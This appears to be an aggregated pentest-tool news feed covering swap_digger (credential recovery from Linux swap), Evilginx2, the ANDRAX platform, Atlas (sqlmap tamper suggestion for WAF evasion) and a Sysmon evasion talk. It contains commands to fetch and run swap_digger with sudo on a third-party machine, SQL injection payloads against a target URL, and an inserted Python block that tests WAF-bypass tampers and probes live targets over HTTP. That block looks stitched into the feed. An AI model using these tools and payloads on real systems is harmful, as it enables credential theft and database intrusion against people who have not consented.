Swap Digger – Tool That Automates Swap Extraction And Searches For Linux User Credentials, Web Forms Credentials, Web Forms Emails, Http Basic Authentication, Wifi SSID And Keys, Etc

swap_digger is a bash script that automates Linux swap analysis for post-exploitation or forensics purposes. It automates swap extraction and searches for Linux user credentials, web form credentials, web form emails, HTTP Basic authentication, WiFi SSIDs and keys, etc.

Download and run the tool

On your machine

Use the following commands to download and run the script on your machine:

alice@1nvuln3r4bl3:~$ git clone https://github.com/sevagas/swap_digger.git
alice@1nvuln3r4bl3:~$ cd swap_digger
alice@1nvuln3r4bl3:~$ chmod +x swap_digger.sh
alice@1nvuln3r4bl3:~$ sudo ./swap_digger.sh -vx

On a mounted hard drive

To use swap_digger on a mounted hard drive, do the following. First, download the script:

alice@1nvuln3r4bl3:~$ git clone https://github.com/sevagas/swap_digger.git
alice@1nvuln3r4bl3:~$ cd swap_digger
alice@1nvuln3r4bl3:~$ chmod +x swap_digger.sh

Then, find the target swap file/partition with:

alice@1nvuln3r4bl3:~$ sudo ./swap_digger.sh -S

Finally, analyze the target by running (the -r path must be the mounted root of the target, so that its /etc/shadow is readable, and -s the swap device or dump found in the previous step):

alice@1nvuln3r4bl3:~$ sudo ./swap_digger.sh -vx -r path/to/mounted/target/root/fs -s path/to/target/swap/device

On a third party machine

Use the following commands to download and run the script on a third-party machine (useful for pentests and CTFs):

alice@1nvuln3r4bl3:~$ wget https://raw.githubusercontent.com/sevagas/swap_digger/master/swap_digger.sh
alice@1nvuln3r4bl3:~$ chmod +x swap_digger.sh
alice@1nvuln3r4bl3:~$ sudo ./swap_digger.sh -vx

Note: use the -c option to automatically remove the working directory created by swap_digger (/tmp/swap_dig) when the script finishes.

Simple run

If you only need to recover clear text Linux user passwords, simply run:

alice@1nvuln3r4bl3:~$ sudo ./swap_digger.sh

Available options

./swap_digger.sh [ OPTIONS ]

Options:
  -x, --extended             Run extended tests on the target swap to retrieve other interesting data (web passwords, emails, WiFi creds, most accessed URLs, etc.)
  -g, --guessing             Try to guess potential passwords based on observations and stats. Warning: this option is not reliable; it may dig more passwords as well as hundreds of false positives.
  -h, --help                 Display this help.
  -v, --verbose              Verbose mode.
  -l, --log                  Log all outputs in a log file (protected inside the generated working directory).
  -c, --clean                Automatically erase the generated working directory at the end of the script (this also removes the log file).
  -r PATH, --root-path=PATH  Location of the target file-system root (default value is /). Change this value for forensic analysis when the target is a mounted file system. This option has to be used along with the -s option to indicate the path to the swap device.
  -s PATH, --swap-path=PATH  Location of the swap device or swap dump to analyse. Use this option for forensic/remote analysis of a swap dump or a mounted external swap partition. This option should be used with the -r option, pointing to a root under which at least /etc/shadow exists.
  -S, --swap-search          Search for all available swap devices (use for forensics).

Relevant resources

Blog post about swap digging: http://blog.sevagas.com/?Digging-passwords-in-Linux-swap

Contact

Feel free to message on my Twitter account @EmericNasi

Download Swap_Digger

Link: http://feedproxy.google.com/~r/PentestTools/~3/FdfKjJxumdE/swap-digger-tool-that-automates-swap.html

Evilginx2 Man-in-the-Middle Attacks – Tradecraft Security Weekly #29

Evilginx2 is a man-in-the-middle framework that can be used to intercept credentials, including the two-factor methods victims use when logging in to a web application. Instead of just duplicating the target web application, it proxies traffic to it, making the experience seamless to the victim. In this episode Ralph May (@ralphte1) joins Beau Bullock to demo […]
The post Evilginx2 Man-in-the-Middle Attacks – Tradecraft Security Weekly #29 appeared first on Security Weekly.

Link: http://feedproxy.google.com/~r/securityweekly/Lviv/~3/ZzWhS1W1NOM/

ANDRAX – The First And Unique Penetration Testing Platform For Android Smartphones

ANDRAX: The first and unique penetration testing platform for Android smartphones

What is ANDRAX

ANDRAX is a penetration testing platform developed specifically for Android smartphones. ANDRAX runs natively on Android, so it behaves like a common Linux distribution, but more powerful than a common distribution!

Why is Android so powerful?

Simple: everyone has a smartphone and spends all the time with it, so we can easily blend in among everyone. The processor architecture of most Android smartphones is ARM, a modern and robust architecture extremely superior to the rest. With touch screens we can run the tools with great agility and take advantage of the graphical interface of Android. We can get in almost anywhere with our smartphones...

In technical terms, ANDRAX and NetHunter should never be compared: ANDRAX is a penetration testing platform for Android smartphones, while NetHunter is just a Debian emulator running with chroot.

Termux is not our enemy. Termux is an application that allows installation of many Linux packages using a Debian environment running natively on Android. ANDRAX and Termux have a similar development; ANDRAX and Termux share many libs and GNU/Linux resources. But Termux is not a penetration testing platform; it is software to bring the basic tools found in a Debian environment. Penetration tests are not something basic, but advanced techniques that involve advanced tools and an advanced environment to conduct good tests! So you can install many tools manually in Termux, but it would be extremely difficult to optimize and configure them to take 100% of the required potential for penetration testing. Termux runs without root privileges, and this makes it very difficult to use advanced tools.

Features and Tools

Tool list

Information Gathering: Whois, Bind DNS tools, Dnsrecon, Raccoon, DNS-Cracker, Firewalk
Scanning: Nmap - Network Mapper, Masscan, SSLScan, Amap
Packet Crafting: Hping3, Nping, Scapy, Hexinject, Ncat, Socat
Network Hacking: ARPSpoof, Bettercap, MITMProxy, EvilGINX2
WebSite Hacking: 0d1n, Wapiti3, Recon-NG, PHPSploit, Photon, XSSer, Commix, SQLMap, Payloadmask, AbernathY-XSS
Password Hacking: Hydra, Ncrack, John The Ripper, CRUNCH
Wireless Hacking: VMP Evil AP, Aircrack-NG Tools, Cowpatty, MDK3, Reaver
Exploitation: MetaSploit Framework, RouterSploit Framework, Getsploit, OWASP ZSC, Rop-TOOL
More...

Advanced Terminal: advanced and professional terminal emulator for hacking!
Dynamic Categories Overlay (DCO): beautiful tools category system
Advanced IDE: complete support for many programming languages
Information Gathering: tools for initial information about the target
Scanning: tools for the second stage, scanning
Packet Crafting: tools to craft network packets
Network Hacking: tools for network hacking
WebSite Hacking: tools for website and web app hacking
Password Hacking: tools to break passwords
Wireless Hacking: tools for wireless hacking
Exploitation: tools to develop and launch exploits

More info on the official site.

Download ANDRAX

Link: http://feedproxy.google.com/~r/PentestTools/~3/aFUTP3UzC5o/andrax-first-and-unique-penetration.html

Atlas – Quick SQLMap Tamper Suggester

Atlas is an open source tool that suggests sqlmap tampers to bypass a WAF/IDS/IPS. It works from the HTTP status code returned for each tampered version of the payload: a tamper whose output no longer triggers the blocking status code is a candidate.

Installation

$ git clone https://github.com/m4ll0k/Atlas.git atlas
$ cd atlas
$ python atlas.py

Usage

$ python atlas.py --url http://site.com/index.php?id=Price_ASC --payload="-1234 AND 4321=4321-- AAAA" --dbms=mysql --random-agent -v

Example

Run sqlmap:

$ python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3

The injected payload Price_ASC') AND 8716=4837 AND ('yajr'='yajr is blocked by the WAF/IDS/IPS, so try Atlas with that payload:

$ python atlas.py --url 'http://site.com/index.php?id=Price_ASC' --payload="') AND 8716=4837 AND ('yajr'='yajr" --random-agent -v

Then re-run sqlmap with the tampers Atlas suggests:

$ python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3 --tamper=versionedkeywords,...

Download Atlas
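The status-code logic behind a suggester like Atlas, as an added example written for this page (not Atlas's or sqlmap's code): a handful of tamper functions named after the sqlmap tampers whose idea they simplify, a constructed regex "WAF" standing in for the real target, and a function that applies each tamper to the blocked payload and keeps the ones whose output comes back with a non-blocking status. The WAF_RULES list is invented for the demonstration, not any product's signature set; http_status is the assumed way to swap the stand-in for a real HTTP probe and is not exercised offline.

```python
import random
import re
import urllib.error
import urllib.parse
import urllib.request

# Constructed stand-in for a WAF: regexes a rule set might use against
# boolean-based blind payloads. Not a real product's signatures.
WAF_RULES = [
    re.compile(r"\bAND\s+\d+\s*=\s*\d+", re.I),   # boolean condition: AND 8716=4837
    re.compile(r"\bOR\s+\d+\s*=\s*\d+", re.I),
    re.compile(r"\bUNION\s+SELECT\b", re.I),
    re.compile(r"\s--\s", re.I),
]

def waf_status(payload):
    """403 if any rule fires, else 200: the only signal the suggester needs."""
    return 403 if any(r.search(payload) for r in WAF_RULES) else 200

# Simplified re-implementations of the ideas behind a few sqlmap tampers.
def space2comment(p):
    return p.replace(" ", "/**/")

def versionedkeywords(p):
    return re.sub(r"\b(AND|OR|UNION|SELECT)\b", r"/*!\1*/", p, flags=re.I)

def randomcase(p, rng=random.Random(1)):          # fixed seed keeps the demo repeatable
    return "".join(rng.choice((c.lower(), c.upper())) for c in p)

def between(p):
    return re.sub(r"(\d+)\s*=\s*(\d+)", r"\1 BETWEEN \2 AND \2", p)

def equaltolike(p):
    return p.replace("=", " LIKE ")

TAMPERS = {f.__name__: f for f in (space2comment, versionedkeywords, randomcase, between, equaltolike)}

def suggest_tampers(payload, status_fn=waf_status, blocked=(403, 406, 501)):
    """Return (baseline status, sorted names of tampers whose output is not blocked)."""
    baseline = status_fn(payload)
    passing = [name for name, fn in TAMPERS.items() if status_fn(fn(payload)) not in blocked]
    return baseline, sorted(passing)

def http_status(url, payload, timeout=10):
    """Assumed real-world probe: append the payload to the URL and return the HTTP status."""
    req = urllib.request.Request(url + urllib.parse.quote(payload, safe=""),
                                 headers={"User-Agent": "Mozilla/5.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as exc:
        return exc.code

if __name__ == "__main__":
    blocked_payload = "') AND 8716=4837 AND ('yajr'='yajr"   # the payload from the page's example
    base, names = suggest_tampers(blocked_payload)
    print("baseline status:", base)
    print("sqlmap --tamper=" + ",".join(names))
```

Against a live target the call becomes suggest_tampers(payload, lambda p: http_status(url, p)); note that a 200 only means the request got past the filter, so the suggested tampers still have to be confirmed by sqlmap itself, and randomcase is a reminder that a case-insensitive rule is not fooled by case changes.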

Link: http://feedproxy.google.com/~r/PentestTools/~3/V9GwuZh2QZc/atlas-quick-sqlmap-tamper-suggester.html

Offensive Operating Against SysMon, Carlos Perez – Paul’s Security Weekly #577

Carlos Perez delivers the Technical Segment on how to operate offensively against Sysmon. He talks about how Sysmon lets him create rules and track specific types of tradecraft around process creation and process termination. He dives into network connections, driver loading, image loading, creation of remote threads, and more! Full Show Notes. Visit our website: […]
The post Offensive Operating Against SysMon, Carlos Perez – Paul’s Security Weekly #577 appeared first on Security Weekly.

Link: http://feedproxy.google.com/~r/securityweekly/Lviv/~3/ZcUh9FtxQUc/